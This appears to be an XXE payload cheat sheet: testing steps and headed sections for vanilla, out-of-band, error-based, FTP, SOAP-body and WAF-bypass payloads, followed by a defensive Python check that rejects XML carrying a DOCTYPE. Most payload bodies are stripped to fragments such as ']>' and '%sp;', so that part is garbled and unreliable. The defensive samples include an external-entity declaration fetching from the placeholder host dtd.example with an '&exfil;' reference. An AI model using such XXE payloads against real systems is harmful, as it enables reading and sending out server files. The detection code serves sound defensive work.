XXE payload

1. How the vulnerability works

An XXE vulnerability exists when the XML input is user-controlled and the backend does not filter it: the XML parser resolves the external entities the document references.

2. Testing for the vulnerability

When capturing a request in Burp, add the header Content-Type: application/xml to the request
and an XML body; if the response shows an error or the XML is processed, an XXE vulnerability may exist. Keep fuzzing based on the response.

3. XXE payloads

Payloads collected from the internet

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------




]>
&sp;

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------




%sp;
%param1;
]>
&exfil;

## External dtd: ##


">

----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------



%sp;
%param1;
%exfil;
]>

## External dtd: ##


">

---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------




%sp;
%param3;
%exfil;
]>

## External dtd: ##
">

-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------



%sp;
%param3;
%exfil;
]>

## External dtd: ##

'> %param1; %external;


-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------



 
">

%dtd;
]>
&all;
 
## External dtd: ##
 


------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------



  %one;
  %two;
  %four;
]>

## External dtd: ##


">

-------------------------^ you might need to encode this % (depends on your target) as: &#x25;

--------------
FTP
--------------


%asd;
%c;
]>
&rrr;


## External dtd ##

">

---------------------------
Inside SOAP body
---------------------------
 %dtd;]>]]>


---------------------------
Untested - WAF Bypass
---------------------------

 
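A defender-side check for the pattern all of these payloads share, added here as an example that is not part of the original collection: every variant above (vanilla, OoB, error-based, FTP and the SOAP-body one) needs a DOCTYPE to declare its entities, so an application that never needs a DTD can refuse such a document before handing it to its real parser. It uses Python's standard-library expat; the sample documents and the host dtd.example are constructed placeholders.

```python
import xml.parsers.expat as expat


class DoctypeRejected(ValueError):
    """Document carries a DOCTYPE, the only place XML entities can be declared."""

def check_no_dtd(xml_bytes: bytes) -> bool:
    """Return True if the document has no DOCTYPE; raise DoctypeRejected otherwise.
    Parameter-entity parsing is switched off so that the checker itself never
    fetches an external DTD (the SYSTEM / %sp; pattern in the payloads above)."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} rejected (SYSTEM={sysid!r})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)  # raises ExpatError on malformed input
    return True

def classify(xml_bytes: bytes) -> str:
    """Label a document 'ok', 'rejected' (DOCTYPE present) or 'malformed'."""
    try:
        check_no_dtd(xml_bytes)
        return "ok"
    except DoctypeRejected:
        return "rejected"
    except expat.ExpatError:
        return "malformed"

def cdata_text(xml_bytes: bytes) -> bytes:
    """Collect the character data (CDATA included) of an envelope that already
    passed check_no_dtd, so the inner text is classified again before any
    component parses it as XML (the 'Inside SOAP body' case above)."""
    parts = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = parts.append
    parser.Parse(xml_bytes, True)
    return "".join(parts).encode()

# Constructed samples; dtd.example is a placeholder host, not a real target.
SAMPLES = {
    "plain": b"<order><id>42</id></order>",
    "external_dtd": b'<!DOCTYPE doc [<!ENTITY % sp SYSTEM "http://dtd.example/sp.dtd"> %sp;]>'
                    b"<doc>&exfil;</doc>",
    "undeclared_ref": b"<doc>&sp;</doc>",
    "soap_cdata": b'<body><![CDATA[<!DOCTYPE d [<!ENTITY % dtd SYSTEM "http://dtd.example/">'
                  b" %dtd;]><x/>]]></body>",
}
```

The SOAP sample shows the caveat: the envelope itself passes, so text pulled out of a CDATA section must be checked again before anything parses it as XML. This pre-check complements, and does not replace, disabling DTDs and external entities in the real parser's own settings.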
